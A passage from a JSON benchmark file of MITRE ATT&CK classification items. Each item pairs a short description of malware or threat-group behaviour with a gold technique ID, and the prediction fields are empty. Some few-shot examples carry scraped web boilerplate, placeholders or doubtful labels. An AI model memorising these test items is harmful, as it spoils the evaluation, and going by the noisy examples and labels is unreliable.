JavaScript\n\t - T1071.002: Application Layer Protocol - File Transfer Protocols\n", + "input": "ShadowPad has used UDP for C2 communications.", + "gold": "- T1095: Non-Application Layer Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Audio surveillance: The malware uses the NAudio library to interact with the microphone and manage the audio stream. The library is stored server-side and pushed to the victim\u2019s machine using a special command. The bot will display the messages using a standard message box. The log includes the process name used by the victim, and keystrokes. The theft is performed by a specific component that enumerates credentials saved in various browsers. Process manager: The attacker can obtain a list of running processes and terminate these by using a specific button\n\t - T1123: Audio Capture\n- Text: Pupy can drop a mouse-logger that will take small screenshots around at each click and then send back to the server.\n\t - T1113: Screen Capture\n- Text: NanoCore can access the victim's webcam and capture data.\n\t - T1125: Video Capture\n", + "input": "Derusbi is capable of performing audio captures.", + "gold": "- T1123: Audio Capture", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MiniDuke can use DGA to generate new Twitter URLs for C2.\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n- Text: Cobalt Strike uses a custom command and control protocol that can encapsulated in DNS. All protocols use their standard assigned ports.\n\t - T1071.004: Application Layer Protocol - DNS\n- Text: The payload will communicate with its C2 server to obtain the session ID and pre-shared key and write it to this registry key in the following format: _ To obtain the session ID and pre-shared key, the payload will first try to contact the C2 via an HTTPS GET request to the following URL: hxxps://www.rdppath[.]com/ If the above request using HTTPS does not result in an HTTP 200 OK message or the response data has no alphanumeric characters, the code will attempt to communicate with the C2 server using HTTP via the following URL: hxxp://www.rdppath[.]com/ The code to communicate with the C2 via HTTP exists within an exception handler\n\t - T1071: Application Layer Protocol\n\t - T1008: Fallback Channels\n", + "input": "BONDUPDATER uses a DGA to communicate with command and control servers.", + "gold": "- T1568.002: Dynamic Resolution - Domain Generation Algorithms", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Volgmer stores the encoded configuration file in the Registry key \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Security\".\n\t - T1112: Modify Registry\n- Text: No matching sample found for T1218.014\n- Text: uses SSL/TLS and RC4 to encrypt traffic.\n\t - T1573: Encrypted Channel\n", + "input": "gh0st RAT has altered the InstallTime subkey.", + "gold": "- T1112: Modify Registry", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Inception has used malicious HTA files to drop and execute malware.\n\t - T1218.005: System Binary Proxy Execution - Mshta\n- Text: Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of multiple components that result in the plug-in loader payload being downloaded and executed\n\t - T1204.001: User Execution - Malicious Link\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n", + "input": "LazyScripter has used `rundll32.exe` to execute Koadic stagers.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Ramsay can use UACMe for privilege escalation.\n\t - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control\n- Text: FunnyDream can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms.\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: KillDisk\u2019s infection chain . How is it dropped in the system. This KillDisk variant looks like it is intentionally dropped by another process/attacker. The new KillDisk variant\u2019s parameter to shut down the affected machine . KillDisk also has a self-destruct process, although it isn\u2019t really deleting itself. Code snippets showing how KillDisk overwrites then deletes files . How does it wipe the disk. It reads the Master Boot Record (MBR) of every device it successfully opens and proceeds to overwrite the first 0x20 sectors of the device with \u201c0x00\u201d. It uses the information from the MBR to do further damage to the partitions it lists. KillDisk has a numeric parameter that denotes the number of minutes (15 being the default) it will wait before it shuts down the affected machine. To try to reboot the machine, it will try to terminate these processes: This is done most likely to force a reboot or dupe the user into restarting the machine. Additionally, the website utilizes an AI-based application that runs in the background and optimizes its accessibility level constantly. Vision Impaired Profile: this profile adjusts the website so that it is accessible to the majority of visual impairments such as Degrading Eyesight, Tunnel Vision, Cataract, Glaucoma, and others. Accept Cancel Continue Processing the data, please give it a few seconds\n\t - T1134: Access Token Manipulation\n", + "input": "Koadic has 2 methods for elevating integrity. It can bypass UAC through `eventvwr.exe` and `sdclt.exe`.", + "gold": "- T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Wizard Spider has used Digicert code-signing certificates for some of its malware.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: The Bazar Loader malware was using a code signing certificate signed by Digicert under the organization NOSOV SP Z O O\n\t - T1588.003: Obtain Capabilities - Code Signing Certificates\n- Text: Patchwork has created self-signed certificates from fictitious and spoofed legitimate software companies that were later used to sign malware.\n\t - T1587.002: Develop Capabilities - Code Signing Certificates\n", + "input": "TA505 has signed payloads with code signing certificates from Thawte and Sectigo.", + "gold": "- T1553.002: Subvert Trust Controls - Code Signing", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Unwraps a DLL into memory and calls its one-and-only import using Reflective DLL injection. DLL information\n\t - T1082: System Information Discovery\n- Text: The paths discovered are: \u2022 C:\\Users\\leo\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\poopak\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\Vendetta\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\Turk\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based\n\t - T1033: System Owner/User Discovery\n\t - T1005: Data from Local System\n\t - T1087: Account Discovery\n\t - T1204: User Execution\n- Text: Wizard Spider has used \"ipconfig\" to identify the network configuration of a victim machine.\n\t - T1016: System Network Configuration Discovery\n", + "input": "TajMahal has the ability to identify hardware information, the computer name, and OS information on an infected host.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Attor monitors the free disk space on the system.\n\t - T1082: System Information Discovery\n- Text: Clop has been packed to help avoid detection.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: Gelsemium can drop itself in \"C:\\Windows\\System32\\spool\\prtprocs\\x64\\winprint.dll\" to be loaded automatically by the spoolsv Windows service.\n\t - T1547.012: Boot or Logon Autostart Execution - Print Processors\n", + "input": "Darkhotel has collected the hostname, OS version, service pack version, and the processor architecture from the victim\u2019s machine.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Zeus Panda queries the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects LANG_RUSSIAN, LANG_BELARUSIAN, LANG_KAZAK, or LANG_UKRAINIAN.\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: The fourth-stage wiper starts off by enumerating from A to Z, looking for fixed and remote logical drives in the system. Enumerates logical drives. For each enumeration, it performs a breadth-first search to wipe the files in the logical drive while ignoring files located in the \"%HOMEDRIVE%\\Windows\" directory\n\t - T1049: System Network Connections Discovery\n\t - T1082: System Information Discovery\n- Text: can identify logged in users across the domain and views user sessions.\n\t - T1033: System Owner/User Discovery\n", + "input": "Astaroth collects the machine name and keyboard language from the system.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In october 2016 Group-IB published the report about the Cobalt group. Now, a year later, this group is continuing to attack banks, which is reported monthly by Group-IB's Threat Intelligence team. Network penetration In all cases investigated by Group-IB, the Cobalt group used a set of spear phishing emails to gain initial access to the corporate infrastructure. However, some of the email addresses belong to employees that no longer work at the organization, which means that the Cobalt group likely uses out-of-date mailing lists. Provision of the malware survivability The Cobalt group uses different methods to ensure malware survivability on corporate networks. From our experience, the Cobalt group uses a new method to provide its survivability in every attack. The former module is installed on a system that has access to the Internet and provides interaction with the C&C server using HTTP/HTTPS/DNS protocols. Another module is installed even in systems that do not have Internet access, as, using SMB protocol (which is typically used within a local network), the SMB module is controlled via infected computers running the HTTP/HTTPS/DNS module. For interaction on HTTPS protocol, HTTP protocol profiles may be used with an indicated SSL certificate, but for data exchange on the DNS protocol, it requires DNS A, AAAA, and TXT records. Conclusion After infecting one computer on an organization's network, the Cobalt group analyzes the programs used on it and search for critical servers and the computers from which they are accessed\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n- Text: GCMAN uses VNC for lateral movement.\n\t - T1021.005: Remote Services - VNC\n- Text: While sending to the C2 server, the data is formatted as follows: @{SYSINFO = $get.ToString(); ACTION = \"REGISTER\";} Ability to take screenshots\n\t - T1113: Screen Capture\n", + "input": "njRAT has a module for performing remote desktop access.", + "gold": "- T1021.001: Remote Services - Remote Desktop Protocol", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA\n\t - T1567.002: Exfiltration Over Web Service - Exfiltration to Cloud Storage\n- Text: HOPLIGHT has used its C2 channel to exfiltrate data.\n\t - T1041: Exfiltration Over C2 Channel\n- Text: APT12 has used blogs and WordPress for C2 infrastructure.\n\t - T1102.002: Web Service - Bidirectional Communication\n", + "input": "ZIRCONIUM has exfiltrated files via the Dropbox API C2.", + "gold": "- T1041: Exfiltration Over C2 Channel", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: uses Rundll32 for executing the dropper program.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: The attacker then executed a persistent malicious PowerShell code that was used to download and execute another PowerShell backdoor file in the server from the malicious IP address 185[.]82[.]219[.]201, as shown in Figure 7.\n\t - T1590.005: Gather Victim Network Information - IP Addresses\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1027.003: Obfuscated Files or Information - Steganography\n\t - T1216: System Script Proxy Execution\n\t - T1546.013: Event Triggered Execution - PowerShell Profile\n\t - T1059: Command and Scripting Interpreter\n\t - T1064: Scripting\n- Text: Compiled HTML File (CHM) are commonly Microsoft help files. These file will be a compiled HTML files that includes documents , image , scripts etc. Hackers will abuse these files to embed malicious payload with CHM files. CHM files can be executed by HH.exe , which is a Microsoft windows utility. Adversaries use this techniques to evade AV or application blacklisting techniques.\n\t - T1218: System Binary Proxy Execution\n", + "input": "EnvyScout has the ability to proxy execution of malicious files with Rundll32.", + "gold": "- T1218.011: System Binary Proxy Execution - Rundll32", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Kimsuky has used pass the hash for authentication to remote access software used in C2.\n\t - T1550.002: Use Alternate Authentication Material - Pass the Hash\n- Text: Pupy can also perform pass-the-ticket.\n\t - T1550.003: Use Alternate Authentication Material - Pass the Ticket\n- Text: APT33 has used a variety of publicly available tools like LaZagne to gather credentials.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1555: Credentials from Password Stores\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n", + "input": "Empire can perform pass the hash attacks.", + "gold": "- T1550.002: Use Alternate Authentication Material - Pass the Hash", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation CuckooBees, the threat actors used the `net group` command as part of their advanced reconnaissance.\n\t - T1069.001: Permission Groups Discovery - Local Groups\n- Text: Equation has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.\n\t - T1120: Peripheral Device Discovery\n- Text: Wizard Spider has used \"whoami\" to identify the local user and their privileges.\n\t - T1033: System Owner/User Discovery\n", + "input": "FlawedAmmyy enumerates the privilege level of the victim during the initial infection.", + "gold": "- T1069.001: Permission Groups Discovery - Local Groups", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: How about DPAPI with keys tied per user & system. Volume serial ID keying. See the APT41 talk #FireEyeSummit7:19 PM \u00b7 Oct 30, 2019\u00b7Twitter for Android12 Retweets1 Quote Tweet35 LikesNick Carr@ItsReallyNick\n\t - T1480.001: Execution Guardrails - Environmental Keying\n- Text: Metamorfo has collected the hostname and operating system version from the compromised host.\n\t - T1082: System Information Discovery\n- Text: Pillowmint has been decompressed by included shellcode prior to being launched.\n\t - T1140: Deobfuscate/Decode Files or Information\n", + "input": "PowerPunch can use the volume serial number from a target host to generate a unique XOR key for the next stage payload.", + "gold": "- T1480.001: Execution Guardrails - Environmental Keying", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: UnionCryptoUpdater.exe does not immediately download the stage 2 malware but instead downloads it after a time specified by the C2 server. This delay could be implemented to prevent researchers from directly obtaining the stage 2 malware\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: ZIRCONIUM has used a tool to capture the time on a compromised host in order to register it with C2.\n\t - T1124: System Time Discovery\n- Text: When comparing the provided timestamps of the delivery documents to the timestamps for the remote template documents from Table 2, we find that the time to attack is directly correlated to the last time the templates are modified\n\t - T1070.006: Indicator Removal - Timestomp\n\t - T1124: System Time Discovery\n", + "input": "GoldMax has set an execution trigger date and time, stored as an ASCII Unix/Epoch time value.", + "gold": "- T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In the course of our research we uncovered the activity of a hacking group which has Chinese origins. This group was named \u201cWinnti\n\t - T1083: File and Directory Discovery\n- Text: FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.\n\t - T1555: Credentials from Password Stores\n- Text: WINDSHIELD can gather Registry values.\n\t - T1012: Query Registry\n", + "input": "BlackEnergy gathers a list of installed apps from the uninstall program Registry. It also gathers registered mail, browser, and instant messaging clients from the Registry. BlackEnergy has searched for given file types.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: QakBot can use \"net share\" to identify network shares for use in lateral movement.\n\t - T1135: Network Share Discovery\n- Text: APT41 has transferred implant files using Windows Admin Shares.\n\t - T1021.002: Remote Services - SMB/Windows Admin Shares\n- Text: Chimera has collected data of interest from network shares.\n\t - T1039: Data from Network Shared Drive\n", + "input": "OSInfo discovers shares on the network", + "gold": "- T1135: Network Share Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Malicious web shell activity as observed in the Cybereason solution. Commands executed via a modified version of the China Chopper web shell\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n\t - T1505.003: Server Software Component - Web Shell\n- Text: Proton uses macOS' .command file type to script actions.\n\t - T1059.004: Command and Scripting Interpreter - Unix Shell\n- Text: When neither of the previous commands are received, the message is taken as a command to be executed with cmd.exe. The output is sent to the server.\n\t - T1059: Command and Scripting Interpreter\n\t - T1202: Indirect Command Execution\n", + "input": "ServHelper can execute shell commands against cmd.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ShimRatReporter sent collected system and network information compiled into a report to an adversary-controlled C2.\n\t - T1020: Automated Exfiltration\n- Text: KONNI has stored collected information and discovered processes in a tmp file.\n\t - T1005: Data from Local System\n- Text: We are still analyzing this Trojan to determine the specific structure of the data sent between the Trojan and the C2 server; however, it does appear that the Trojan is using the RC4 algorithm to encrypt data sent to the C2 server within HTTP POST requests\n\t - T1573: Encrypted Channel\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "PLEAD has the ability to upload and download files to and from an infected host.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: A dropper used by installs itself into the ASEP Registry key HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run with a value named McUpdate.\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: Recursively generate a list of files in a directory and send to the control server - Terminate a specific process. The process is identified by the control server sending the PID to the malware\n\t - T1057: Process Discovery\n\t - T1543.003: Create or Modify System Process - Windows Service\n\t - T1119: Automated Collection\n- Text: uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process.\n\t - T1112: Modify Registry\n", + "input": "Vasport copies itself to disk and creates an associated run key Registry entry to establish.", + "gold": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Campaign Code and Compile Time Correlation In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code\n\t - T1124: System Time Discovery\n- Text: Crimson can identify the geographical location of a victim host.\n\t - T1614: System Location Discovery\n- Text: AppleJeus has waited a specified time before downloading a second stage payload.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n", + "input": "Crimson has the ability to determine the date and time on a compromised host.", + "gold": "- T1124: System Time Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: MCMD has the ability to upload files from an infected device.\n\t - T1005: Data from Local System\n- Text: Leviathan has used C:\\Windows\\Debug and C:\\Perflogs as staging directories.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: These commands allow the threat group to gain information about the compromised computer and the network to which it belongs. Using this information, they can decide to explore further or instruct the compromised computer to download additional malware\n\t - T1016: System Network Configuration Discovery\n\t - T1082: System Information Discovery\n\t - T1007: System Service Discovery\n", + "input": "Honeybee collects data from the local victim system.", + "gold": "- T1005: Data from Local System", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request.\n\t - T1071.001: Application Layer Protocol - Web Protocols\n- Text: HEXANE has used tools including BITSAdmin to test internet connectivity from compromised hosts.\n\t - T1016.001: System Network Configuration Discovery - Internet Connection Discovery\n- Text: Pupy can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.\n\t - T1041: Exfiltration Over C2 Channel\n", + "input": "PowGoop can send HTTP GET requests to malicious servers.", + "gold": "- T1071.001: Application Layer Protocol - Web Protocols", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: DRATzarus has been named `Flash.exe`, and its dropper has been named `IExplorer`.\n\t - T1036.005: Masquerading - Match Legitimate Name or Location\n- Text: DDKONG uses Rundll32 to ensure only a single instance of itself is running at once.\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n- Text: No matching sample found for T1505.005\n", + "input": "Sibot has downloaded a DLL to the \"C:\\windows\\system32\\drivers\\\" folder and renamed it with a \".sys\" extension.", + "gold": "- T1036.005: Masquerading - Match Legitimate Name or Location", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The 